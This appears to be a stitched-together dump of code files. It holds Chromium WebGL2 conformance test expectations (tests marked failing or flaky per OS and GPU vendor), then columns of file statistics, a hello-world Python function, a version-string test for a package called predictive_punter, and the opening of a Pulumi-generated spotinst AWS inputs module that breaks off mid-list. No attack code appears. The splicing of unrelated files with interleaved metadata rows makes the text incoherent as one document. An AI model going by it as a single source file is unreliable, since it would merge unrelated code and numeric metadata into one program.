'teximage2d_unpack_params.html',
['mac', 'amd'], bug=679058)
self.Fail('conformance2/rendering/clipping-wide-points.html',
['mac', 'amd'], bug=642822)
# Mac Pro with AMD GPU
self.Flaky('deqp/functional/gles3/shaderindexing/tmp.html',
['mac', ('amd', 0x679e)], bug=659871)
# Mac Intel
# Regressions in 10.12.4 on Haswell GPUs.
self.Fail('deqp/functional/gles3/fbocolorbuffer/tex2d_00.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('deqp/functional/gles3/fboinvalidate/format_00.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_05.html',
['mac', ('intel', 0x0a2e)], bug=718194)
self.Fail('conformance2/rendering/framebuffer-texture-level1.html',
['mac', 'intel'], bug=680278)
self.Fail('conformance2/textures/misc/angle-stuck-depth-textures.html',
['mac', 'intel'], bug=679692)
self.Fail('deqp/functional/gles3/fbomultisample*',
['mac', 'intel'], bug=641209)
self.Fail('deqp/functional/gles3/texturefiltering/2d_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/' +
'cube_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/' +
'2d_array_combinations_01.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_06.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_07.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturefiltering/3d_combinations_08.html',
['mac', 'intel'], bug=606074)
self.Fail('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texturelod.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texturegrad.html',
['mac', 'intel'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'textureprojgrad.html',
['mac', 'intel'], bug=483282)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-r8ui-red_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/canvas_sub_rectangle/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['yosemite', 'intel'], bug=665656)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/image_data/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['mac', 'intel'], bug=665197)
self.Fail('conformance2/textures/misc/' +
'integer-cubemap-texture-sampling.html',
['mac', 'intel'], bug=658930)
# Linux only.
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_byte.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_short_4_4_4_4.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgba-rgba-unsigned_short_5_5_5_1.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgb-rgb-unsigned_byte.html',
['linux'], bug=627525)
self.Flaky('conformance/textures/video/' +
'tex-2d-rgb-rgb-unsigned_short_5_6_5.html',
['linux'], bug=627525)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-nv-driver-bug.html',
['linux'], bug=483282)
self.Fail('conformance2/textures/image_bitmap_from_image/' +
'tex-3d-r16f-red-float.html', ['linux'], bug=679695)
# Linux Multi-vendor failures.
self.Skip('deqp/data/gles3/shaders/qualification_order.html',
['linux', 'amd', 'intel'], bug=483282)
self.Flaky('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['linux', 'amd', 'intel'], bug=618447)
self.Fail('conformance2/rendering/clipping-wide-points.html',
['linux', 'amd', 'intel'], bug=662644) # WebGL 2.0.1
# Linux NVIDIA
# This test is flaky both with and without ANGLE.
self.Flaky('deqp/functional/gles3/texturespecification/' +
'random_teximage2d_2d.html',
['linux', 'nvidia'], bug=618447)
self.Fail('conformance/glsl/bugs/unary-minus-operator-float-bug.html',
['linux', 'nvidia'], bug=672380)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'nvidia'], bug=709351)
self.Fail('conformance2/textures/image_bitmap_from_canvas/' +
'tex-3d-srgb8_alpha8-rgba-unsigned_byte.html',
['linux', 'nvidia'], bug=679677)
self.Fail('conformance2/rendering/framebuffer-texture-level1.html',
['linux', 'nvidia', 'opengl'], bug=680278)
self.Fail('conformance2/textures/image/' +
'tex-3d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('nvidia', 0xf02)], bug=680282)
self.Flaky('conformance2/textures/image_bitmap_from_image_data/' +
'tex-2d-srgb8-rgb-unsigned_byte.html',
['linux', 'nvidia'], bug=694354)
# Linux NVIDIA Quadro P400
# This test causes a lost device and then the next test fails.
self.Skip('conformance2/rendering/blitframebuffer-size-overflow.html',
['linux', ('nvidia', 0x1cb3)], bug=709320)
# Linux Intel
self.Fail('conformance2/extensions/ext-color-buffer-float.html',
['linux', 'intel'], bug=640389)
self.Fail('WebglExtension_EXT_disjoint_timer_query_webgl2',
['linux', 'intel'], bug=687210)
# See https://bugs.freedesktop.org/show_bug.cgi?id=94477
self.Skip('conformance/glsl/bugs/temp-expressions-should-not-crash.html',
['linux', 'intel'], bug=540543) # GPU timeout
self.Fail('deqp/functional/gles3/fbomultisample.8_samples.html',
['linux', 'intel'], bug=635528)
self.Fail('conformance2/textures/misc/tex-subimage3d-pixel-buffer-bug.html',
['linux', 'intel'], bug=662644) # WebGL 2.0.1
self.Fail('deqp/functional/gles3/shadertexturefunction/texturesize.html',
['linux', 'intel'], bug=666384)
self.Fail('conformance2/textures/misc/tex-3d-mipmap-levels-intel-bug.html',
['linux', 'intel'], bug=666384)
# Fails on Intel Mesa GL 3.3, passes on Intel Mesa GL 4.5.
self.Fail('conformance2/misc/views-with-offsets.html',
['linux', 'intel', 'no_angle'], bug=664180)
# Linux Intel with ANGLE only
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['linux', 'intel', 'opengl'], bug=598902)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'intel', 'opengl'], bug=680276)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'intel', 'opengl'], bug=680276)
# Linux Intel HD 530
self.Fail('conformance/extensions/webgl-compressed-texture-astc.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-filter-outofbounds.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'intel', 'no_angle'], bug=680720)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'intel', 'no_angle'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['linux', 'intel'], bug=680720)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_00.html',
['linux', 'intel'], bug=680720)
self.Fail('conformance2/glsl3/' +
'vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'intel'], bug=709874)
# Intermittently running out of memory.
self.Flaky('deqp/functional/gles3/texturefiltering/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/textureformat/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/textureshadow/*',
['linux', 'intel'], bug=725664)
self.Flaky('deqp/functional/gles3/texturespecification/*',
['linux', 'intel'], bug=725664)
# Linux AMD only.
# It looks like AMD shader compiler rejects many valid ES3 semantics.
self.Fail('conformance/glsl/misc/shaders-with-invariance.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/glsl3/vector-dynamic-indexing-swizzled-lvalue.html',
['linux', 'amd'], bug=709351)
self.Fail('deqp/functional/gles3/multisample.html',
['linux', 'amd'], bug=617290)
self.Fail('deqp/data/gles3/shaders/conversions.html',
['linux', 'amd'], bug=483282)
self.Skip('deqp/data/gles3/shaders/arrays.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/internalformatquery.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturestatequery.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/buffercopy.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/samplerobject.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shaderprecision_int.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturefiltering/3d*',
['linux', 'amd'], bug=606114)
self.Fail('deqp/functional/gles3/shadertexturefunction/texture.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/texturegrad.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadertexturefunction/' +
'texelfetchoffset.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/vertexarrays/' +
'single_attribute.first.html',
['linux', 'amd'], bug=694877)
self.Fail('deqp/functional/gles3/negativetextureapi.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/transformfeedback/array_separate*.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/misc/uninitialized-test-2.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/reading/read-pixels-from-fbo-test.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/rendering/blitframebuffer-filter-srgb.html',
['linux', 'amd'], bug=634525)
self.Fail('conformance2/rendering/blitframebuffer-outside-readbuffer.html',
['linux', 'amd'], bug=662644) # WebGL 2.0.1
self.Fail('conformance2/renderbuffers/framebuffer-texture-layer.html',
['linux', 'amd'], bug=295792)
self.Fail('conformance2/textures/misc/tex-mipmap-levels.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/textures/misc/copy-texture-image-luma-format.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_cube_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_pbo_params.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'teximage2d_depth_pbo.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_copyteximage2d.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'basic_teximage3d_3d_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage2d_format_depth_stencil.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_2d_array_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_00.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_02.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_3d_03.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_depth_stencil.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/texturespecification/' +
'texstorage3d_format_size.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/vertexarrays/' +
'single_attribute.output_type.unsigned_int.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/draw/*.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/fbomultisample*',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/fbocompleteness.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/textureshadow/*.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_highp.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_lowp.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/mul_dynamic_mediump.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shadermatrix/pre_decrement.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_04.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_07.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_08.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_10.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_11.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_12.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_13.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_18.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_25.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_28.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_29.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_30.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_31.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_32.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_33.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/conversion_34.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/framebufferblit/' +
'default_framebuffer_00.html',
['linux', 'amd'], bug=658832)
self.Fail('deqp/functional/gles3/shaderoperator/unary_operator_01.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/shaderoperator/unary_operator_02.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/glsl3/vector-dynamic-indexing.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/reading/read-pixels-pack-parameters.html',
['linux', 'amd', 'no_angle'], bug=483282)
self.Fail('conformance2/textures/misc/tex-unpack-params.html',
['linux', 'amd', 'no_angle'], bug=483282)
self.Fail('conformance2/extensions/ext-color-buffer-float.html',
['linux', 'amd'], bug=633022)
self.Fail('conformance2/rendering/blitframebuffer-filter-outofbounds.html',
['linux', 'amd'], bug=655147)
self.Fail('conformance2/textures/misc/tex-base-level-bug.html',
['linux', 'amd'], bug=705865)
self.Fail('conformance2/textures/image/' +
'tex-2d-r11f_g11f_b10f-rgb-float.html',
['linux', 'amd'], bug=705865)
# Uniform buffer related failures
self.Fail('deqp/functional/gles3/uniformbuffers/single_struct_array.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/single_nested_struct.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/' +
'single_nested_struct_array.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/multi_basic_types.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/multi_nested_struct.html',
['linux', 'amd'], bug=483282)
self.Fail('deqp/functional/gles3/uniformbuffers/random.html',
['linux', 'amd'], bug=483282)
self.Fail('conformance2/buffers/uniform-buffers.html',
['linux', 'amd'], bug=658842)
self.Fail('conformance2/rendering/uniform-block-buffer-size.html',
['linux', 'amd'], bug=658844)
# Linux AMD R7 240
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rg8ui-rg_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgb8ui-rgb_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/webgl_canvas/' +
'tex-2d-rgba8ui-rgba_integer-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=710392)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba16f-rgba-half_float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba32f-rgba-float.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba4-rgba-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_bitmap_from_video/' +
'tex-2d-rgba4-rgba-unsigned_short_4_4_4_4.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb565-rgb-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb565-rgb-unsigned_short_5_6_5.html',
['linux', ('amd', 0x6613)], bug=701138)
self.Fail('conformance2/textures/image_data/' +
'tex-3d-rgb5_a1-rgba-unsigned_byte.html',
['linux', ('amd', 0x6613)], bug=701138)
# Conflicting expectations to test that the
# "Expectations have no collisions" unittest works.
# page_name = 'conformance/glsl/constructors/glsl-construct-ivec4.html'
# Conflict when all conditions match
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflict when all conditions match (and different sets)
# self.Fail(page_name,
# ['linux', 'win', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['linux', 'mac', ('nvidia', 0x1), 'amd', 'debug', 'opengl'])
# Conflict with one aspect not specified
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflict with one aspect not specified (in both conditions)
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# Conflict even if the GPU is specified in a device ID
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', 'nvidia', 'debug'])
# Test there are no conflicts between two different devices
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('nvidia', 0x2), 'debug'])
# Test there are no conflicts between two devices with different vendors
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', ('amd', 0x1), 'debug'])
# Conflicts if there is a device and nothing specified for the other's
# GPU vendors
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug'])
# self.Fail(page_name,
# ['linux', 'debug'])
# Test no conflicts happen when only one aspect differs
# self.Fail(page_name,
# ['linux', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['win', ('nvidia', 0x1), 'debug', 'opengl'])
# Conflicts if between a generic os condition and a specific version
# self.Fail(page_name,
# ['xp', ('nvidia', 0x1), 'debug', 'opengl'])
# self.Fail(page_name,
# ['win', ('nvidia', 0x1), 'debug', 'opengl'])
| 47.931389
| 81
| 0.650462
| 6,455
| 55,888
| 5.534934
| 0.098528
| 0.081057
| 0.122313
| 0.128695
| 0.844548
| 0.814795
| 0.780648
| 0.75431
| 0.717393
| 0.668523
| 0
| 0.084358
| 0.172148
| 55,888
| 1,165
| 82
| 47.972532
| 0.687855
| 0.082218
| 0
| 0.673319
| 0
| 0.00105
| 0.542345
| 0.457166
| 0
| 0
| 0.010242
| 0
| 0
| 1
| 0.002101
| false
| 0.063025
| 0.00105
| 0
| 0.004202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
3f0a75d7e38c23741bcc1b35cd2e52d04d871cbd
| 105
|
py
|
Python
|
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | 1
|
2019-04-21T12:07:20.000Z
|
2019-04-21T12:07:20.000Z
|
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | null | null | null |
wwj_pylab/online_code.py
|
wwj718/wwj_pylab
|
652d4f146f73712c7b50329a721ef96c04d28b67
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
# encoding: utf-8
def hello():
#print "hello world"
return "hello world"
| 13.125
| 24
| 0.628571
| 15
| 105
| 4.4
| 0.8
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012195
| 0.219048
| 105
| 7
| 25
| 15
| 0.792683
| 0.52381
| 0
| 0
| 0
| 0
| 0.23913
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
3f42eb97646f4abc56713bf75bf7b85a199dd35d
| 183
|
py
|
Python
|
tests/predictive_punter_test.py
|
justjasongreen/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 6
|
2018-08-28T16:26:44.000Z
|
2021-04-20T17:33:44.000Z
|
tests/predictive_punter_test.py
|
predictive-punter/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 39
|
2016-07-22T08:14:33.000Z
|
2016-08-01T14:13:26.000Z
|
tests/predictive_punter_test.py
|
predictive-punter/predictive_punter
|
746e13befcd950228e3807d16e5971324dbd6ca2
|
[
"MIT"
] | 2
|
2016-12-15T06:03:57.000Z
|
2020-01-13T14:25:11.000Z
|
import predictive_punter
def test_version():
"""predictive_punter.__version__ should return the correct version string"""
assert predictive_punter.__version__ == '1.0.0a4'
| 22.875
| 80
| 0.765027
| 22
| 183
| 5.818182
| 0.681818
| 0.375
| 0.359375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025478
| 0.142077
| 183
| 7
| 81
| 26.142857
| 0.789809
| 0.382514
| 0
| 0
| 0
| 0
| 0.065421
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
451dfe8ec28156eda59f215cd42feefeb2c7332f
| 401,955
|
py
|
Python
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 4
|
2019-12-21T20:50:43.000Z
|
2021-12-01T20:57:38.000Z
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | 103
|
2019-12-09T22:03:16.000Z
|
2022-03-30T17:07:34.000Z
|
sdk/python/pulumi_spotinst/aws/_inputs.py
|
pulumi/pulumi-spotinst
|
75592d6293d63f6cec703722f2e02ff1fb1cca44
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'BeanstalkDeploymentPreferencesArgs',
'BeanstalkDeploymentPreferencesStrategyArgs',
'BeanstalkManagedActionsArgs',
'BeanstalkManagedActionsPlatformUpdateArgs',
'BeanstalkScheduledTaskArgs',
'ElastigroupCpuOptionsArgs',
'ElastigroupEbsBlockDeviceArgs',
'ElastigroupEphemeralBlockDeviceArgs',
'ElastigroupInstanceTypesWeightArgs',
'ElastigroupIntegrationBeanstalkArgs',
'ElastigroupIntegrationBeanstalkDeploymentPreferencesArgs',
'ElastigroupIntegrationBeanstalkDeploymentPreferencesStrategyArgs',
'ElastigroupIntegrationBeanstalkManagedActionsArgs',
'ElastigroupIntegrationBeanstalkManagedActionsPlatformUpdateArgs',
'ElastigroupIntegrationCodedeployArgs',
'ElastigroupIntegrationCodedeployDeploymentGroupArgs',
'ElastigroupIntegrationDockerSwarmArgs',
'ElastigroupIntegrationDockerSwarmAutoscaleDownArgs',
'ElastigroupIntegrationDockerSwarmAutoscaleHeadroomArgs',
'ElastigroupIntegrationEcsArgs',
'ElastigroupIntegrationEcsAutoscaleAttributeArgs',
'ElastigroupIntegrationEcsAutoscaleDownArgs',
'ElastigroupIntegrationEcsAutoscaleHeadroomArgs',
'ElastigroupIntegrationEcsBatchArgs',
'ElastigroupIntegrationGitlabArgs',
'ElastigroupIntegrationGitlabRunnerArgs',
